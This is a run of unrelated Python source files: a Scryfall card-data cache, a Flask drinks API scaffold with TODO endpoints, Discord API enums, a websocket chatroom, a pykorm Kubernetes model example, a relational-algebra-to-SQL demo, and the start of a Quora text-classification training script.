# We need to clear the database out. Delete all the cards in the database.
with orm.db_session:
orm.delete(c for c in self.db.Card)
def _bulk_update_database(self):
# Request the /bulkdata endpoint from Scryfall. Do not request this from cache.
bulk_req = self.session.get("https://api.scryfall.com/bulk-data")
bulk_req.raise_for_status()
bulkdata = bulk_req.json()
# Get the URI for the all_cards object.
for obj in bulkdata["data"]:
if obj["type"] == self.BULK_DATA_LIST:
bulk_data_list_uri = obj["permalink_uri"]
break
else:
raise ScryfallCacheException(
"Failed to find {0}".format(self.BULK_DATA_LIST)
)
# Request the bulk data list from the URI we just queried.
bulk_data_list_req = self.session.get(bulk_data_list_uri)
bulk_data_list_req.raise_for_status()
# Clear the database of cards.
self._bulk_clear_database()
# Insert the data into the database.
log.debug("Starting bulk card insertion")
with orm.db_session:
for card_obj in bulk_data_list_req.json():
# Create the card.
self.db.Card(
id=card_obj["id"],
name=card_obj["name"],
mtgo_id=card_obj.get("mtgo_id", None),
mtgo_foil_id=card_obj.get("mtgo_foil_id", None),
data=card_obj,
)
log.debug("Finished bulk card insertion")
# Update the metadata to store the latest timestamp
self._update_metadata()
def _update_metadata(self):
with orm.db_session:
metadata = orm.select(m for m in self.db.Metadata).first()
# Update the timestamp
metadata.lastupdate = int(time.time())
log.debug("Updated metadata: last update now %d", metadata.lastupdate)
def _download_scryfall_to_file(self, url, target_path):
tmp_file = "{0}._scry".format(target_path)
log.debug("Downloading %s to %s", url, tmp_file)
req = self.session.get(url, stream=True)
req.raise_for_status()
with open(tmp_file, "wb") as f:
for chunk in req.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
log.debug("Downloaded %s to %s", url, tmp_file)
# Move the temporary file to the new destination.
shutil.move(tmp_file, target_path)
log.debug("Moved temporary download file %s to %s", tmp_file, target_path)
def _query_scryfall(self, url, timeout=ONE_DAY):
with orm.db_session:
result = self.db.ScryfallResultCache.get(url=url)
now = int(time.time())
if result and result.timestamp + timeout > now:
log.debug("Found result in cache")
return result.data
# Query Scryfall.
try:
res = self.session.get(url)
res.raise_for_status()
# Convert the result to an object.
card_data = res.json()
# Store the result in the database.
with orm.db_session:
log.debug("Storing result for url %s at timestamp %d", url, now)
self.db.ScryfallResultCache(url=url, timestamp=now, data=card_data)
return card_data
except requests.exceptions.RequestException:
log.exception("Failed to find information from URL: %s", url)
return None
def get_local_image_path(self, card, art_format):
"""Retrieve the local image path for a given image.
If necessary, download the image into place before returning.
Args:
card (ScryfallCard): ScryfallCard object returned from get_card().
art_format (str): One of the art formats to download. See
https://scryfall.com/docs/api/images for more detail.
Raises:
ScryfallCacheException: on failure
Returns:
str: the file path
"""
card_data = card.get_dict()
if "image_uris" not in card_data:
log.error("[%s] No images found", card)
raise ScryfallCacheException("No images found")
if art_format not in card_data["image_uris"]:
log.error("[%s] Format %r not found", card, art_format)
raise ScryfallCacheException("Art format {0} not found".format(art_format))
uri = card_data["image_uris"][art_format]
log.debug("[%s] Image URI for %r: %s", card, art_format, uri)
# Create the folders necessary to store this image.
art_cache_path = os.path.join(self.app.user_data_dir, "art_cache", art_format)
if not os.path.isdir(art_cache_path):
os.makedirs(art_cache_path)
# Determine the extension. As per the API, everything is a JPG except PNG.
if art_format == "png":
extension = "png"
else:
extension = "jpg"
local_path = os.path.join(
art_cache_path,
"{id}.{extension}".format(id=card.get_id(), extension=extension),
)
log.debug("[%s] Local image path for %s: %s", card, art_format, local_path)
if not os.path.exists(local_path):
# Need to download that image!
self._download_scryfall_to_file(uri, local_path)
return local_path
def close(self):
"""Close the connection to the database."""
self.db.disconnect()
class ScryfallCard(object):
"""Wrapper object for a Scryfall card data dictionary."""
def __init__(self, cache, card_dict):
"""
Construct a ScryfallCard.
Args:
cache (ScryfallCache): reference to parent Cache object.
card_dict (dict): Card data dictionary.
"""
self._id = card_dict["id"]
self._name = card_dict["name"]
self._cache = cache
self._card_dict = card_dict
def __repr__(self):
"""
Return a str representation of this object when it was constructed.
Returns:
str: A representation of this object when it was constructed.
"""
return "{self.__class__.__name__}({self._cache!r}, {self._card_dict!r})".format(
self=self
)
def __str__(self):
"""
Return a useful str representation of this object.
Returns:
str: A useful representation of this object
"""
return "{self.__class__.__name__}[{self._name} @ {self._id}]".format(self=self)
def get_id(self):
"""
Return the Scryfall ID for this card.
Returns:
str: The Scryfall ID for this card.
"""
return self._id
def get_name(self):
"""
Return the name for this card.
Returns:
str: The name of this card.
"""
return self._name
def get_dict(self):
"""
Return the card data dictionary for this card.
Returns:
dict: The card data dictionary for this card.
"""
return self._card_dict
def get_image_path(self, art_format):
"""
Get or download the chosen art format for this card.
Args:
art_format (str): One of the art formats to download. See
https://scryfall.com/docs/api/images for more detail.
Returns:
str: Path to local file.
"""
return self._cache.get_local_image_path(self, art_format)
def define_entities(db):
"""Define entities on a database object.
Args:
db (orm.Database): Database object to define entities on.
"""
class Card(db.Entity):
"""Card database object as retrieved from Scryfall."""
id = orm.PrimaryKey(str)
name = orm.Required(str, index=True)
mtgo_id = orm.Optional(int, index=True)
mtgo_foil_id = orm.Optional(int, index=True)
data = orm.Required(orm.Json)
class Metadata(db.Entity):
"""Metadata about the cache."""
lastupdate = orm.Required(int)
version = orm.Required(str)
class ScryfallResultCache(db.Entity):
"""URL response retrieved from Scryfall."""
url = orm.PrimaryKey(str)
timestamp = orm.Required(int)
data = orm.Required(orm.Json)
def open_database(database_path, create_db=True, sql_debug=False):
"""Create a connection to an sqlite database.
Args:
database_path (str): Path to the sqlite database.
create_db (bool): Whether to create the database if it doesn't exist.
sql_debug (bool): Whether to enable SQL debugging
Returns:
Database object
"""
# Create a database object using Pony for abstraction.
db = orm.Database()
define_entities(db)
# Bind to the database at the given path.
db.bind(provider="sqlite", filename=database_path, create_db=create_db)
# Create database tables if necessary.
try:
orm.set_sql_debug(sql_debug)
db.generate_mapping(create_tables=True)
except orm.dbapiprovider.OperationalError as e:
# There was a problem when checking the database. Drop the tables (with
# all data) and recreate the tables. This is currently our fix for
# schema migration while Pony does not support migration.
log.warning(
"Hit problem while checking database. "
"Recreating tables to attempt recovery."
)
log.debug("Dropping tables")
db.drop_all_tables(with_all_data=True)
log.debug("Creating tables")
db.create_tables()
return db
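if __name__ == "__main__":
    # Hedged usage sketch of the classes above; the application name and
    # the card name are illustrative assumptions, not part of this module.
    logging.basicConfig(level=logging.INFO)
    cache = ScryfallCache(application="scryfall_cache_demo")
    card = cache.get_card(name="Black Lotus")
    if card:
        print("Found:", card)
        # Downloads (or reuses) the normal-size card image; see
        # https://scryfall.com/docs/api/images for the format names.
        print("Image at:", card.get_image_path("normal"))
    cache.close()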
|
import os
from flask import Flask, request, jsonify, abort
from sqlalchemy import exc
import json
from flask_cors import CORS
from .database.models import db_drop_and_create_all, setup_db, Drink
from .auth.auth import AuthError, requires_auth
app = Flask(__name__)
setup_db(app)
CORS(app)
'''
@TODO uncomment the following line to initialize the database
!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH
!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN
'''
# db_drop_and_create_all()
## ROUTES
'''
@TODO implement endpoint
GET /drinks
it should be a public endpoint
it should contain only the drink.short() data representation
returns status code 200 and json {"success": True, "drinks": drinks} where drinks is the list of drinks
or appropriate status code indicating reason for failure
'''
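# A minimal sketch of the endpoint described above, assuming the Drink model
# exposes `query` and `short()` as the docstring implies; illustrative only,
# not the project's reference solution.
@app.route('/drinks', methods=['GET'])
def get_drinks():
    drinks = [drink.short() for drink in Drink.query.all()]
    return jsonify({
        "success": True,
        "drinks": drinks
    }), 200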
'''
@TODO implement endpoint
GET /drinks-detail
it should require the 'get:drinks-detail' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drinks} where drinks is the list of drinks
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
POST /drinks
it should create a new row in the drinks table
it should require the 'post:drinks' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drink} where drink is an array containing only the newly created drink
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
PATCH /drinks/<id>
where <id> is the existing model id
it should respond with a 404 error if <id> is not found
it should update the corresponding row for <id>
it should require the 'patch:drinks' permission
it should contain the drink.long() data representation
returns status code 200 and json {"success": True, "drinks": drink} where drink is an array containing only the updated drink
or appropriate status code indicating reason for failure
'''
'''
@TODO implement endpoint
DELETE /drinks/<id>
where <id> is the existing model id
it should respond with a 404 error if <id> is not found
it should delete the corresponding row for <id>
it should require the 'delete:drinks' permission
returns status code 200 and json {"success": True, "delete": id} where id is the id of the deleted record
or appropriate status code indicating reason for failure
'''
## Error Handling
'''
Example error handling for unprocessable entity
'''
@app.errorhandler(422)
def unprocessable(error):
return jsonify({
"success": False,
"error": 422,
"message": "unprocessable"
}), 422
'''
@TODO implement error handlers using the @app.errorhandler(error) decorator
each error handler should return (with appropriate messages):
jsonify({
"success": False,
"error": 404,
"message": "resource not found"
}), 404
'''
'''
@TODO implement error handler for 404
error handler should conform to general task above
'''
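# A minimal 404 handler following the pattern given above.
@app.errorhandler(404)
def not_found(error):
    return jsonify({
        "success": False,
        "error": 404,
        "message": "resource not found"
    }), 404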
'''
@TODO implement error handler for AuthError
error handler should conform to general task above
'''
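# A hedged AuthError handler, assuming AuthError exposes `status_code` and
# an `error` payload as provided by the imported auth module.
@app.errorhandler(AuthError)
def handle_auth_error(err):
    return jsonify({
        "success": False,
        "error": err.status_code,
        "message": err.error
    }), err.status_code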
|
"""
MIT License
Copyright (c) 2021-present RPS
Copyright (c) 2015-2021 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from enum import Enum
from typing import (
Optional,
Dict,
Type,
Any,
TypeVar
)
# Credit To Rapptz For The Enums
class ChannelType(Enum):
text = 0
private = 1
voice = 2
group = 3
category = 4
news = 5
store = 6
news_thread = 10
public_thread = 11
private_thread = 12
stage_voice = 13
def __str__(self):
return self.name
class MessageType(Enum):
default = 0
recipient_add = 1
recipient_remove = 2
call = 3
channel_name_change = 4
channel_icon_change = 5
pins_add = 6
new_member = 7
premium_guild_subscription = 8
premium_guild_tier_1 = 9
premium_guild_tier_2 = 10
premium_guild_tier_3 = 11
channel_follow_add = 12
guild_stream = 13
guild_discovery_disqualified = 14
guild_discovery_requalified = 15
guild_discovery_grace_period_initial_warning = 16
guild_discovery_grace_period_final_warning = 17
thread_created = 18
reply = 19
application_command = 20
thread_starter_message = 21
guild_invite_reminder = 22
class VoiceRegion(Enum):
us_west = 'us-west'
us_east = 'us-east'
us_south = 'us-south'
us_central = 'us-central'
eu_west = 'eu-west'
eu_central = 'eu-central'
singapore = 'singapore'
london = 'london'
sydney = 'sydney'
amsterdam = 'amsterdam'
frankfurt = 'frankfurt'
brazil = 'brazil'
hongkong = 'hongkong'
russia = 'russia'
japan = 'japan'
southafrica = 'southafrica'
south_korea = 'south-korea'
india = 'india'
europe = 'europe'
dubai = 'dubai'
vip_us_east = 'vip-us-east'
vip_us_west = 'vip-us-west'
vip_amsterdam = 'vip-amsterdam'
def __str__(self):
return self.value
class SpeakingState(Enum):
none = 0
voice = 1
soundshare = 2
priority = 4
def __str__(self):
return self.name
def __int__(self):
return self.value
# Note: discord.py's custom Enum accepts a `comparable=True` class keyword;
# the stdlib Enum imported above does not (it fails at class creation), so
# the keyword is dropped here and on the comparable classes below.
class VerificationLevel(Enum):
none = 0
low = 1
medium = 2
high = 3
highest = 4
def __str__(self):
return self.name
class ContentFilter(Enum):  # `comparable=True` dropped; see note on VerificationLevel
disabled = 0
no_role = 1
all_members = 2
def __str__(self):
return self.name
class Status(Enum):
online = 'online'
offline = 'offline'
idle = 'idle'
dnd = 'dnd'
do_not_disturb = 'dnd'
invisible = 'invisible'
def __str__(self):
return self.value
class DefaultAvatar(Enum):
blurple = 0
grey = 1
gray = 1
green = 2
orange = 3
red = 4
def __str__(self):
return self.name
class NotificationLevel(Enum):  # `comparable=True` dropped; see note on VerificationLevel
all_messages = 0
only_mentions = 1
class AuditLogActionCategory(Enum):
create = 1
delete = 2
update = 3
class AuditLogAction(Enum):
# fmt: off
guild_update = 1
channel_create = 10
channel_update = 11
channel_delete = 12
overwrite_create = 13
overwrite_update = 14
overwrite_delete = 15
kick = 20
member_prune = 21
ban = 22
unban = 23
member_update = 24
member_role_update = 25
member_move = 26
member_disconnect = 27
bot_add = 28
role_create = 30
role_update = 31
role_delete = 32
invite_create = 40
invite_update = 41
invite_delete = 42
webhook_create = 50
webhook_update = 51
webhook_delete = 52
emoji_create = 60
emoji_update = 61
emoji_delete = 62
message_delete = 72
message_bulk_delete = 73
message_pin = 74
message_unpin = 75
integration_create = 80
integration_update = 81
integration_delete = 82
stage_instance_create = 83
stage_instance_update = 84
stage_instance_delete = 85
sticker_create = 90
sticker_update = 91
sticker_delete = 92
thread_create = 110
thread_update = 111
thread_delete = 112
# fmt: on
@property
def category(self) -> Optional[AuditLogActionCategory]:
# fmt: off
lookup: Dict[AuditLogAction, Optional[AuditLogActionCategory]] = {
AuditLogAction.guild_update: AuditLogActionCategory.update,
AuditLogAction.channel_create: AuditLogActionCategory.create,
AuditLogAction.channel_update: AuditLogActionCategory.update,
AuditLogAction.channel_delete: AuditLogActionCategory.delete,
AuditLogAction.overwrite_create: AuditLogActionCategory.create,
AuditLogAction.overwrite_update: AuditLogActionCategory.update,
AuditLogAction.overwrite_delete: AuditLogActionCategory.delete,
AuditLogAction.kick: None,
AuditLogAction.member_prune: None,
AuditLogAction.ban: None,
AuditLogAction.unban: None,
AuditLogAction.member_update: AuditLogActionCategory.update,
AuditLogAction.member_role_update: AuditLogActionCategory.update,
AuditLogAction.member_move: None,
AuditLogAction.member_disconnect: None,
AuditLogAction.bot_add: None,
AuditLogAction.role_create: AuditLogActionCategory.create,
AuditLogAction.role_update: AuditLogActionCategory.update,
AuditLogAction.role_delete: AuditLogActionCategory.delete,
AuditLogAction.invite_create: AuditLogActionCategory.create,
AuditLogAction.invite_update: AuditLogActionCategory.update,
AuditLogAction.invite_delete: AuditLogActionCategory.delete,
AuditLogAction.webhook_create: AuditLogActionCategory.create,
AuditLogAction.webhook_update: AuditLogActionCategory.update,
AuditLogAction.webhook_delete: AuditLogActionCategory.delete,
AuditLogAction.emoji_create: AuditLogActionCategory.create,
AuditLogAction.emoji_update: AuditLogActionCategory.update,
AuditLogAction.emoji_delete: AuditLogActionCategory.delete,
AuditLogAction.message_delete: AuditLogActionCategory.delete,
AuditLogAction.message_bulk_delete: AuditLogActionCategory.delete,
AuditLogAction.message_pin: None,
AuditLogAction.message_unpin: None,
AuditLogAction.integration_create: AuditLogActionCategory.create,
AuditLogAction.integration_update: AuditLogActionCategory.update,
AuditLogAction.integration_delete: AuditLogActionCategory.delete,
AuditLogAction.stage_instance_create: AuditLogActionCategory.create,
AuditLogAction.stage_instance_update: AuditLogActionCategory.update,
AuditLogAction.stage_instance_delete: AuditLogActionCategory.delete,
AuditLogAction.sticker_create: AuditLogActionCategory.create,
AuditLogAction.sticker_update: AuditLogActionCategory.update,
AuditLogAction.sticker_delete: AuditLogActionCategory.delete,
AuditLogAction.thread_create: AuditLogActionCategory.create,
AuditLogAction.thread_update: AuditLogActionCategory.update,
AuditLogAction.thread_delete: AuditLogActionCategory.delete,
}
# fmt: on
return lookup[self]
@property
def target_type(self) -> Optional[str]:
v = self.value
if v == -1:
return 'all'
elif v < 10:
return 'guild'
elif v < 20:
return 'channel'
elif v < 30:
return 'user'
elif v < 40:
return 'role'
elif v < 50:
return 'invite'
elif v < 60:
return 'webhook'
elif v < 70:
return 'emoji'
elif v == 73:
return 'channel'
elif v < 80:
return 'message'
elif v < 83:
return 'integration'
elif v < 90:
return 'stage_instance'
elif v < 93:
return 'sticker'
elif v < 113:
return 'thread'
class UserFlags(Enum):
staff = 1
partner = 2
hypesquad = 4
bug_hunter = 8
mfa_sms = 16
premium_promo_dismissed = 32
hypesquad_bravery = 64
hypesquad_brilliance = 128
hypesquad_balance = 256
early_supporter = 512
team_user = 1024
system = 4096
has_unread_urgent_messages = 8192
bug_hunter_level_2 = 16384
verified_bot = 65536
verified_bot_developer = 131072
discord_certified_moderator = 262144
class ActivityType(Enum):
unknown = -1
playing = 0
streaming = 1
listening = 2
watching = 3
custom = 4
competing = 5
def __int__(self):
return self.value
class TeamMembershipState(Enum):
invited = 1
accepted = 2
class WebhookType(Enum):
incoming = 1
channel_follower = 2
application = 3
class ExpireBehaviour(Enum):
remove_role = 0
kick = 1
ExpireBehavior = ExpireBehaviour
class StickerType(Enum):
standard = 1
guild = 2
class StickerFormatType(Enum):
png = 1
apng = 2
lottie = 3
@property
def file_extension(self) -> str:
# fmt: off
lookup: Dict[StickerFormatType, str] = {
StickerFormatType.png: 'png',
StickerFormatType.apng: 'png',
StickerFormatType.lottie: 'json',
}
# fmt: on
return lookup[self]
class InviteTarget(Enum):
unknown = 0
stream = 1
embedded_application = 2
class InteractionType(Enum):
ping = 1
application_command = 2
component = 3
class InteractionResponseType(Enum):
pong = 1
# ack = 2 (deprecated)
# channel_message = 3 (deprecated)
channel_message = 4 # (with source)
deferred_channel_message = 5 # (with source)
deferred_message_update = 6 # for components
message_update = 7 # for components
class VideoQualityMode(Enum):
auto = 1
full = 2
def __int__(self):
return self.value
class ComponentType(Enum):
action_row = 1
button = 2
select = 3
def __int__(self):
return self.value
class ButtonStyle(Enum):
primary = 1
secondary = 2
success = 3
danger = 4
link = 5
# Aliases
blurple = 1
grey = 2
gray = 2
green = 3
red = 4
url = 5
def __int__(self):
return self.value
class StagePrivacyLevel(Enum):
public = 1
closed = 2
guild_only = 2
class NSFWLevel(Enum):  # `comparable=True` dropped; see note on VerificationLevel
default = 0
explicit = 1
safe = 2
age_restricted = 3
T = TypeVar('T')
def create_unknown_value(cls: Type[T], val: Any) -> T:
    # `_enum_value_cls_` is provided by discord.py's custom Enum machinery
    # and does not exist on the stdlib Enum imported above.
    value_cls = cls._enum_value_cls_  # type: ignore
    name = f'unknown_{val}'
    return value_cls(name=name, value=val)
def try_enum(cls: Type[T], val: Any) -> T:
"""A function that tries to turn the value into enum ``cls``.
If it fails it returns a proxy invalid value instead.
"""
try:
return cls._enum_value_map_[val] # type: ignore
except (KeyError, TypeError, AttributeError):
return create_unknown_value(cls, val) |
"""
Chatroom defines handlers for client behavior such as connecting and sending messages
"""
import random
import logging
from string import Template
from collections.abc import Iterable
from utils import log, log_message
from user import User
from command_handler import CommandHandler
from config_manager import ConfigManager
from response import Response, Origin
logger = logging.getLogger(__name__)
class Chatroom:
"""
Chatroom manager for websocket based connections
"""
def __init__(self, chat_config_path):
"""
Create a new Chatroom
Args:
chat_config_path (str): path to chat config yaml
"""
# Dict[Websocket, User]
self.connected = dict()
self.command_handler = CommandHandler()
self.config = ConfigManager(chat_config_path)
self.name_generator = AdjAnimalNameGenerator(
self.config["name_generator"]["adjective_path"],
self.config["name_generator"]["animal_path"])
        self.env = self.config["meta"]["enviornment"]  # sic: "enviornment" matches the key expected in the config file
@log(logger, logging.INFO)
async def handle_connection(self, websocket, name=None):
"""
Registers a new websocket connection and notifies users
Args:
websocket (Websocket): new connection websocket
"""
name = name if name is not None else self.generate_name()
user = User(websocket, name)
self.connected[websocket] = user
await self.send(Response(self.get_greeting(name), Origin.SERVER), websocket)
await self.send_to_all(Response(self.get_connection_notification(name), Origin.SERVER), websocket)
@log(logger, logging.INFO)
async def handle_message(self, websocket, message):
"""
Handles incoming message:
If it is a message, send to all users.
If it is a command, process it
Args:
websocket (Websocket): websocket that sent message
message (str): message sent
"""
user = self.connected[websocket]
if self.command_handler.is_command(message):
await self.command_handler.handle_command(message, user, self)
return
body = f"{user.name}: {message}"
all_response = Response(body, Origin.USER)
sender_response = Response(body, Origin.SELF)
await self.send_to_all(all_response, websocket)
await self.send(sender_response, websocket)
@log(logger, logging.INFO)
async def handle_disconnect(self, websocket):
"""
handles disconnect of websocket and notifies all connections
Args:
websocket (Websocket): Connection that was closed
"""
user = self.connected.pop(websocket)
await self.send_to_all(Response(self.get_disconnect_notification(user.name), Origin.SERVER))
@log(logger, logging.INFO)
async def send(self, response, websocket):
"""Send a response to a websocket
Args:
response (Response): The Response to send
websocket (Websocket): The websocket to send the Response to
"""
if not isinstance(response, Response):
log_message(f"Outgoing: {response} is not of type Response, preventing send", logging.CRITICAL)
return
if response.data["origin"] == Origin.DEFAULT:
            log_message("Outgoing response has DEFAULT origin", logging.WARNING)
await websocket.send(response.json())
@log(logger, logging.INFO)
    async def send_to_all(self, response, skip=()):
        """
        Send a message to all connected clients, except those in skip
        Args:
            response (Response): Response to send to all connections
            skip (optional): Union[Websocket, Iterable[Websocket]] to skip. Defaults to ().
        """
        # An immutable default avoids the shared-mutable-default pitfall;
        # a single websocket is wrapped into a set below.
        if not isinstance(skip, Iterable):
            skip = {skip}
for websocket in self.connected:
if websocket not in skip:
await self.send(response, websocket)
@log(logger, logging.CRITICAL)
async def handle_shutdown(self):
"""
Notifies all clients of shutdown and closes their connections
"""
await self.send_to_all(Response(self.get_shutdown_notification(), Origin.SERVER))
for conn in self.connected.keys():
await conn.close()
@log(logger, logging.INFO)
async def change_name(self, websocket, new_name):
"""
Changes name of user connected with websocket to new_name
Args:
websocket (Websocket): connection to change name of
new_name (str): new name for user
"""
old_name = self.connected[websocket].name
# sanitize by removing all whitespace
new_name = "".join(new_name.split())
self.connected[websocket].name = new_name
await self.send_to_all(Response(self.get_name_change_notification(old_name, new_name), Origin.SERVER))
@log(logger, logging.INFO)
async def private_message(self, message, from_websocket, to_websocket):
outgoing = Response(self.get_outgoing_pm(message, self.connected[from_websocket].name), Origin.PRIVATE)
receipt = Response(self.get_pm_receipt(message, self.connected[to_websocket].name), Origin.PRIVATE)
await self.send(outgoing, to_websocket)
await self.send(receipt, from_websocket)
def generate_name(self):
"""
Generate an initial name for a new client
Returns:
str: Randomly generated name
"""
return self.name_generator.generate_name()
def get_greeting(self, name):
"""
Generates greeting str for new connection
Args:
name (str): client name of new connection
Returns:
str: greeting for new connection
"""
return Template(self.config["greeting_temp"]).substitute(name=name)
def get_connection_notification(self, name):
"""
Generates notification str for a new connection
Args:
name (str): name of new connection client
Returns:
str: notification for clients
"""
return Template(self.config["conn_notif_temp"]).substitute(name=name)
def get_disconnect_notification(self, name):
"""
Generates disconnect notification str for disconnected client
Args:
name (str): name of disconnected client
Returns:
str: notification for clients
"""
return Template(self.config["disconn_notif_temp"]).substitute(name=name)
def get_name_change_notification(self, old_name, new_name):
"""
Generates name change notification
Args:
old_name (str): old name, before change
new_name (str): new name, after change
Returns:
str: notification for clients
"""
return Template(self.config["namechange_notif_temp"]).substitute(old=old_name, new=new_name)
def get_shutdown_notification(self):
"""
Generates server shutdown notification
Returns:
str: notification for clients
"""
return self.config["shutdown_notif_temp"]
    def get_outgoing_pm(self, message, from_name):
        # sic: "messate" matches the misspelled key expected in the chat config
        return Template(self.config["private_messate_from_temp"]).substitute(from_name=from_name, message=message)
def get_pm_receipt(self, message, to_name):
return Template(self.config["private_message_to_temp"]).substitute(to_name=to_name, message=message)
def __repr__(self):
return f"<Chatroom, connections: {len(self.connected)}>"
class AdjAnimalNameGenerator:
def __init__(self, adj_path, animal_path):
with open(adj_path) as adjs:
self.adjectives = [word.strip().capitalize()
for word in adjs.readlines()]
with open(animal_path) as animals:
self.animals = [word.strip().capitalize()
for word in animals.readlines()]
def generate_name(self):
return f"{random.choice(self.adjectives)}{random.choice(self.animals)}"
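if __name__ == "__main__":
    # Hedged wiring sketch: serve the Chatroom with the third-party
    # `websockets` package (an assumption, not a dependency declared in this
    # module); the config path below is also an assumption.
    import asyncio
    import websockets

    room = Chatroom("./chat_config.yaml")

    async def handler(websocket):
        # websockets >= 11 passes only the connection; older versions also
        # pass a `path` argument.
        await room.handle_connection(websocket)
        try:
            async for message in websocket:
                await room.handle_message(websocket, message)
        finally:
            await room.handle_disconnect(websocket)

    async def main():
        async with websockets.serve(handler, "localhost", 8765):
            await asyncio.Future()  # run until cancelled

    asyncio.run(main())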
|
import pykorm
class Score(pykorm.models.Nested):
exterior: int = pykorm.fields.DataField('exterior')
delicious: int = pykorm.fields.DataField('delicious', 10)
class ScoreMixin(object):
score: Score = pykorm.fields.DictNestedField(Score, path=['spec', 'score'])
@pykorm.k8s_custom_object('pykorm.infomaniak.com', 'v1', 'apples')
class Apple(ScoreMixin, pykorm.ClusterModel):
variety: str = pykorm.fields.Spec('variety', 'default-variety')
if __name__ == '__main__':
ap = Apple(name='abc', score=Score(exterior=10))
pk = pykorm.Pykorm()
pk.save(ap)
print(ap)
|
from SPJRUD import SPJRUD
from SPJRUD.Select import Select
from SPJRUD.Project import Project
from SPJRUD.Join import Join
from SPJRUD.Rename import Rename
from SPJRUD.Union import Union
from SPJRUD.Difference import Difference
from Ope.Equal import Equal
from Representation.Constante import Constante
from Representation.Attribute import Attribute
from Representation.Relation import Relation
from sql import *
# On a database
creat_Database("database")
print_TableFromADatabase("database.db", "emp")
x = creat_RelationFromDatabase("database.db", "emp2")
y = creat_RelationFromDatabase("database.db", "emp")
z = creat_RelationFromDatabase("database.db", "dept")
a = Select(Equal("ename", "job"), y)
print(a)
print(a.get_SQL())
print("--------------------------------------------------------------")
b = Project(["ename", "sal", "deptno"], y)
print(b)
print(b.get_SQL())
print("--------------------------------------------------------------")
bb = Project(["dname", "deptno", "loc"], z)
print(bb)
print(bb.get_SQL())
print("--------------------------------------------------------------")
c = Join(b, bb)
print(c)
print(c.get_SQL())
print("--------------------------------------------------------------")
d = Rename("ename", "Nom", y)
print(d)
print(d.get_SQL())
print("--------------------------------------------------------------")
e = Union(x, y)
print(e)
print(e.get_SQL())
print("--------------------------------------------------------------")
f = Difference(x, y)
print(f)
print(f.get_SQL())
print("--------------------------------------------------------------")
g = Join(Project(["name", "sal", "job", "deptno"], Select(Equal("name", Constante("JAMES")), Rename("ename", "name", y))), z)
print(g)
print(g.get_SQL())
print("--------------------------------------------------------------")
h = Select(Equal("name", Constante("JAMES")), Rename("ename", "name", y))
print(h)
print(h.get_SQL())
print("--------------------------------------------------------------")
i = Project(["name", "sal", "job", "deptno"], Select(Equal("sal", Constante(5000.0)), Rename("ename", "name", y)))
print(i)
print(i.get_SQL())
print("--------------------------------------------------------------")
executeSQL_OnDatabase("database.db", i.get_SQL())
print("--------------------------------------------------------------")
# On a relation created by hand
rel = Relation(
"Personne",
[
Attribute("id", 'INTEGER'),
Attribute("nom", 'TEXT'),
Attribute("prenom", 'TEXT')
])
rel2 = Relation(
"Infos_Personne",
[
Attribute("id", 'INTEGER'),
Attribute("sexe", 'TEXT'),
Attribute("age", 'INTEGER'),
Attribute("taille", 'REAL'),
Attribute("poids", 'REAL')
])
a = Select(Equal("nom", "prenom"), rel)
print(a)
print(a.get_SQL())
print("--------------------------------------------------------------")
b = Project(["id", "nom", "prenom"], rel)
print(b)
print(b.get_SQL())
print("--------------------------------------------------------------")
bb = Project(["id", "sexe", "age"], rel2)
print(bb)
print(bb.get_SQL())
print("--------------------------------------------------------------")
c = Join(b, bb)
print(c)
print(c.get_SQL())
print("--------------------------------------------------------------")
d = Rename("nom", "Name", rel)
print(d)
print(d.get_SQL())
print("--------------------------------------------------------------")
g = Join(Project(["id", "nom", "prenom"], Select(Equal("nom", Constante("DELPLANQUE")), rel)), rel2)
print(g)
print(g.get_SQL())
print("--------------------------------------------------------------")
h = Select(Equal("NomDeFamille", Constante("DELPLANQUE")), Rename("nom", "NomDeFamille", rel))
print(h)
print(h.get_SQL())
print("--------------------------------------------------------------") |
import os
import time
import operator
import argparse
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn import metrics
from utils import timer, load_and_preprocess, load_trained_model
def fit_and_eval(X_train, y_train, X_val, y_val, module, pretrained=False):
"""
    Train the model and evaluate hold-out performance, returning a
    per-threshold F1 table (the caller writes it to CSV).
Parameters
----------
X_train, y_train, X_val, y_val: features and targets
module: a python module
pretrained: bool, if true, load the model pickle
Return
------
best_thres: float
df_score: dataframe with thres and f1 score
"""
# get model
model = module.get_model()
# load model
if pretrained:
print('loading model ......')
network = model.model
model.model = load_trained_model(network, module.MODEL_FILEPATH)
else: # or, train model
print('fitting model ......')
model = model.fit(X_train, y_train)
# predict probas
print('predicting probas ......')
y_proba = model.predict_proba(X_val)
# score
scores = {}
for thres in np.arange(0, 0.51, 0.01):
thres = round(thres, 2)
scores[thres] = metrics.f1_score(y_val, (y_proba > thres).astype(int))
print("val F1 score: {:.4f} with threshold at {}".format(scores[thres], thres)) # noqa
# get max
best_thres, best_score = max(scores.items(), key=operator.itemgetter(1))
print("best F1 score: {:.4f} with threshold at {}".format(best_score, best_thres)) # noqa
    # build the per-threshold score table (the caller writes it to disk)
df_score = pd.DataFrame(scores, index=['f1']).transpose()
return best_thres, df_score
def parse_args():
parser = argparse.ArgumentParser(
prog="Quora Insincere Questions Classification",
